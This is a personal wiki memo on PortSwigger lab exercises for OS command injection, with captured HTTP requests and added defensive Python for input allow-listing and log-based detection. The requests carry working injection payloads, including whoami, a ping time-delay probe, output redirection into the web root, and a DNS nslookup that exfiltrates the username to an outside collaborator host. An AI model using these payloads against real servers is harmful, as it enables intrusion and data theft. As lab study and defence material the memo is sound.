BurpSuite_OS command injection - meruneru/tech_memo GitHub Wiki

Overview

A technique for getting the server to execute commands.

For example, consider tampering with the request that is sent when accessing https://insecure-website.com/stockStatus?productID=381&storeID=29.

If the server passes productID/storeID straight through as command-line arguments, a pipe character in either value lets an attacker run an arbitrary command.

```text
POST /product/stock HTTP/1.1
Host: ac491fc11eda67bdc0ed1bcf00d2000a.web-security-academy.net
Cookie: session=MwmFcM7lsKrfjTEACxYjTdkCPVmfzAce
Content-Length: 21
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://ac491fc11eda67bdc0ed1bcf00d2000a.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://ac491fc11eda67bdc0ed1bcf00d2000a.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8
Connection: close

productId=1&storeId=1|whoami
```
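The two server-side patterns behind this lab, as an added Python example that is not from this wiki or from the lab itself: the vulnerable function interpolates productId/storeId into a shell command line (so `storeId=1|whoami` becomes a second command), while the hardened one allow-lists both values and passes them as argv entries with no shell involved. The backend script name `stockreport.pl` is an assumption.

```python
import re
import shlex
import subprocess

STOCK_TOOL = "stockreport.pl"   # assumed backend script name, not from the lab
NUMERIC = re.compile(r"[0-9]{1,9}")
COMMAND_SEPARATORS = {"|", "||", "&", "&&", ";"}


def build_vulnerable_command(product_id: str, store_id: str) -> str:
    """Vulnerable pattern: the exact string a shell=True call hands to /bin/sh.
    Metacharacters in the parameters survive untouched, so '1|whoami' chains
    a second command onto the stock lookup."""
    return f"{STOCK_TOOL} {product_id} {store_id}"


def count_shell_commands(command_line: str) -> int:
    """How many separate commands a shell would run for command_line.
    shlex with punctuation_chars splits '|', '||', ';' and '&' into their
    own tokens, so we count the non-empty segments between them."""
    count, current = 0, 0
    for tok in shlex.shlex(command_line, punctuation_chars=True):
        if tok in COMMAND_SEPARATORS:
            count, current = count + (current > 0), 0
        else:
            current += 1
    return count + (current > 0)


def build_safe_argv(product_id: str, store_id: str) -> list:
    """Hardened pattern: allow-list both parameters and return an argv list.
    With a list and shell=False there is no shell to interpret metacharacters."""
    for name, value in (("productId", product_id), ("storeId", store_id)):
        if not NUMERIC.fullmatch(value):
            raise ValueError(f"{name} must be a short decimal integer")
    return [STOCK_TOOL, product_id, store_id]


def is_accepted(product_id: str, store_id: str) -> bool:
    """True if the hardened validation lets these values through."""
    try:
        build_safe_argv(product_id, store_id)
        return True
    except ValueError:
        return False


def run_stock_check(product_id: str, store_id: str) -> subprocess.CompletedProcess:
    """Hardened call: validated argv, no shell, bounded runtime."""
    return subprocess.run(build_safe_argv(product_id, store_id), shell=False,
                          capture_output=True, text=True, timeout=5, check=False)
```

The allow-list is the real fix; the argv list alone still lets a malicious value reach the backend script as an argument, just not the shell.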

Useful commands

| Purpose of command | Linux | Windows |
| --- | --- | --- |
| Name of current user | whoami | whoami |
| Operating system | uname -a | ver |
| Network configuration | ifconfig | ipconfig /all |
| Network connections | netstat -an | netstat -an |
| Running processes | ps -ef | tasklist |

Detecting blind OS command injection using time delays

The server does not necessarily return the command's output to the client.

To find out whether blind OS command injection is possible, inject a ping that takes 10 seconds to complete, wait for it, and check whether the page behaves differently.

```text
POST /feedback/submit HTTP/1.1
Host: ac5c1f0e1f2e5cadc0492ecc00b8009c.web-security-academy.net
Cookie: session=i2LM41SGuKygsi4jKa94KSHNgJgqzcjR
Content-Length: 92
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://ac5c1f0e1f2e5cadc0492ecc00b8009c.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://ac5c1f0e1f2e5cadc0492ecc00b8009c.web-security-academy.net/feedback
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8
Connection: close

csrf=hgz3R1WbgdCg9jO89EJs4cJOjIL2bT4B&name=aaa&email=bbb%40gmail.com||ping+-c+10+127.0.0.1||&subject=ccc&message=ddd
```
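Detection logic for the time-delay probe above, as an added example that is not from this wiki: it reads constructed application log records (path, raw form body and server-side response time; the field names are assumptions, not a real product's schema), URL-decodes each form field the way the server would, and flags values that carry shell metacharacters or a delay command, noting when the response was also slow.

```python
import json
import re
from urllib.parse import parse_qs

# Characters that let a shell chain a second command onto an argument.
METACHARS = re.compile(r"\|\||&&|[|;&`\n]|\$\(")
# Commands commonly used to introduce a measurable delay (Linux and Windows).
DELAY_CMD = re.compile(r"\b(?:ping\s+-[cn]\s+\d+|sleep\s+\d+|timeout\s+/t\s+\d+)", re.I)
SLOW_MS = 8000  # response-time threshold; tune to the endpoint's normal baseline

# Constructed JSON-lines log for this example: path, raw form body, response time.
SAMPLE_LOG = """\
{"path": "/feedback/submit", "body": "csrf=abc&name=aaa&email=bbb%40gmail.com&subject=ccc&message=ddd", "duration_ms": 120}
{"path": "/feedback/submit", "body": "csrf=abc&name=aaa&email=bbb%40gmail.com||ping+-c+10+127.0.0.1||&subject=ccc&message=ddd", "duration_ms": 10240}
{"path": "/product/stock", "body": "productId=1&storeId=1|whoami", "duration_ms": 95}
"""


def analyse_record(record: dict) -> list:
    """Return one finding per suspicious form field in a single log record."""
    findings = []
    # parse_qs decodes %40 and '+' the same way the application would.
    fields = parse_qs(record["body"], keep_blank_values=True)
    for name, values in fields.items():
        for value in values:
            reasons = []
            if METACHARS.search(value):
                reasons.append("shell metacharacter")
            if DELAY_CMD.search(value):
                reasons.append("delay command")
            # A delay payload that actually slowed the response is the strongest signal.
            if reasons and record.get("duration_ms", 0) >= SLOW_MS:
                reasons.append(f"slow response {record['duration_ms']}ms")
            if reasons:
                findings.append({"path": record["path"], "field": name, "reasons": reasons})
    return findings


def scan_log(text: str) -> list:
    """Run analyse_record over every non-empty line of JSON-lines log text."""
    findings = []
    for line in text.splitlines():
        if line.strip():
            findings.extend(analyse_record(json.loads(line)))
    return findings
```

Matching on decoded values matters: the raw body contains `%40` and `+`, and a rule applied before decoding would miss `ping -c 10` written as `ping+-c+10`.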

Exploiting blind OS command injection by redirecting output

In this lab the result of the blind command injection is redirected to a file, which is then fetched with a GET request. The feedback submission page has a field vulnerable to blind command injection: append ||whoami>/var/www/images/output.txt|| to the end of the email value.

```text
POST /feedback/submit HTTP/1.1
Host: ace21fb71fe801eec0021288009700ef.web-security-academy.net
Cookie: session=t4rq4wwcMwQHuAlbfyNgUWeIBm3wqWtU
Content-Length: 92
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://ace21fb71fe801eec0021288009700ef.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://ace21fb71fe801eec0021288009700ef.web-security-academy.net/feedback
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8
Connection: close

csrf=710tDGHnN1E0QRUAg88EBUkDb2R9JSUu&name=aa&email=ss%40gmail.com||whoami>/var/www/images/output.txt||&subject=ssss&message=mmmm
```

After that, the lab has a page that displays an image file; change the filename to output.txt and fetch it.

```text
GET /image?filename=output.txt HTTP/1.1
Host: ace21fb71fe801eec0021288009700ef.web-security-academy.net
Cookie: session=t4rq4wwcMwQHuAlbfyNgUWeIBm3wqWtU
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ace21fb71fe801eec0021288009700ef.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8
Connection: close
```

Blind OS command injection with out-of-band interaction

Not solved. The walkthrough used the Burp Collaborator client feature, which is only in the Pro edition.

```text
||nslookup+<collaborator URL>||
||nslookup+whoami.<collaborator URL>||
```

```text
POST /feedback/submit HTTP/1.1
Host: ac901f9d1f05c5a2c02f3c110067007d.web-security-academy.net
Cookie: session=ve8Ku5A9o5hicNtxucfPFfpsXChGSEik
Content-Length: 88
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://ac901f9d1f05c5a2c02f3c110067007d.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://ac901f9d1f05c5a2c02f3c110067007d.web-security-academy.net/feedback
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8
Connection: close

csrf=iDnIWDb1BXUX2ouFF3LVNSVfPRWXDk1o&name=d&email=a%40gmail.com||nslookup+<collaborator URL>||&subject=sss&message=aaa
```